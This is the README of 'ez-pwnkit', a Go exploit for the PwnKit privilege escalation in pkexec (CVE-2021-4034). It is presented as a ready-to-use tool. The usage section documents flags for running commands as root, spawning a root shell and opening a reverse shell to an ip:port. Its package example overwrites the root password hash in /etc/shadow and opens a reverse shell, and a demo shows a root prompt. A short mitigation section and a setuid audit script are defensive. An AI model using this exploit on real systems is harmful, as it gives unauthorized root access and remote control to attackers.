
ez-pwnkit

A pure-Go implementation of the CVE-2021-4034 PwnKit exploit.

The exploit uses syscall.ForkExec so that the spawned process survives the end of the main program.

Installation

git clone https://github.com/OXDBXKXO/ez-pwnkit.git
cd ez-pwnkit
make

As the exploit relies on a malicious shared library, a PWN.so file is generated from payload.go and embedded in the resulting exploit executable.

The Makefile uses sed to temporarily change the package name of the payload.go file to main, hence making this Makefile Linux-only.

As the Go payload is not as reliable as the C one, the Makefile will compile the exploit with the C payload by default. You can choose to compile with the Go payload using make build_go.

Usage

As standalone executable

$> ./exploit -h
Usage of ./exploit:
  -c string
        Run command as root in separate process
  -o    Pipe output of forked command to terminal
  -r string
        Open a reverse-shell in separate process. Format: ip:port
  -s    Spawn a root shell

The exploit can either run a command as root (-c), open a reverse shell (-r) or spawn a root shell (-s).

$> ./exploit -s
sh-5.1#
$> ./exploit -c "cat /etc/passwd"
$> ./exploit -o -c "cat /etc/passwd"
[/etc/passwd content]

As package

package main

import (
    "github.com/OXDBXKXO/ez-pwnkit"
)

func main() {
    // Change root password to 'password' (runs in a separate process, output not piped)
    ez_pwnkit.Command(`sed -i -e 's,^root:[^:]\+:,root:$6$eymNRCK.KxwDM6vu$idH0swGW1nsnLb8fT1QibUho5xg7uGJT7fuiheLZHIi9M4gTSk0qIOlUIk2Mm9/Nz5C.T4GkgkmLcK5BtOPkS0:,' etc/shadow`, false)

    // Open a reverse-shell to ip:port
    ez_pwnkit.RevShell("127.0.0.1:1337")
}

Note that, as Command and RevShell use syscall.ForkExec to run the exploit, the resulting processes are separate from the main program and survive its end.

Although go-PwnKit can be imported into your project from GitHub, do not forget that you will be executing an untrusted shared library as root. Using a locally compiled PWN.so is hence highly recommended. Just sayin' 😚

Demonstration

$> ./exploit
sh-5.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.1#

Mitigation

Patch pkexec if possible, otherwise disable the setuid bit on the pkexec binary.

chmod 0755 /usr/bin/pkexec
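A small audit helper for the mitigation above, added here as an example and not part of the ez-pwnkit project: it reports whether a pkexec binary still carries the setuid bit the exploit depends on, and can apply the README's chmod workaround. The function names and the candidate paths checked at the bottom are assumptions.

```shell
#!/bin/sh
# Added example (not ez-pwnkit code): audit pkexec for the setuid bit
# that CVE-2021-4034 relies on, and optionally drop it (chmod u-s is the
# same workaround as the README's chmod 0755). Uses only POSIX ls/chmod,
# so it works with both GNU and BSD userlands.

# Print "setuid" if the file has the setuid bit, "clear" if it does not,
# "missing" if the path does not exist. Always returns 0.
pkexec_setuid_state() {
    path="$1"
    [ -e "$path" ] || { echo missing; return 0; }
    # In `ls -l` output the 4th character is the owner's execute slot:
    # 's' (setuid + exec) or 'S' (setuid, no exec) means the bit is set.
    bit=$(ls -ld "$path" | cut -c4)
    case "$bit" in
        s|S) echo setuid ;;
        *)   echo clear ;;
    esac
}

# Remove the setuid bit and print the resulting state.
# Needs write permission on the file (i.e. root for the real binary).
pkexec_drop_setuid() {
    path="$1"
    chmod u-s "$path"
    pkexec_setuid_state "$path"
}

# Stand-alone usage: report the state of the usual install locations
# (assumed paths; adjust for your distribution). Does not modify anything.
for p in /usr/bin/pkexec /usr/local/bin/pkexec; do
    printf '%s: %s\n' "$p" "$(pkexec_setuid_state "$p")"
done
```

Dropping the setuid bit also disables legitimate privilege elevation through pkexec, so treat it as a stop-gap until the patched polkit package is installed.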

Credits

This project is inspired by several other PoCs of the PwnKit exploit.

Thanks to An00bRektn for the straight-forward exploit setup.

Thanks to PaterGottesman and berdav for the clarity of the exploit explanation.

Thanks to dzonerzy for the GIO_USE_VFS trick.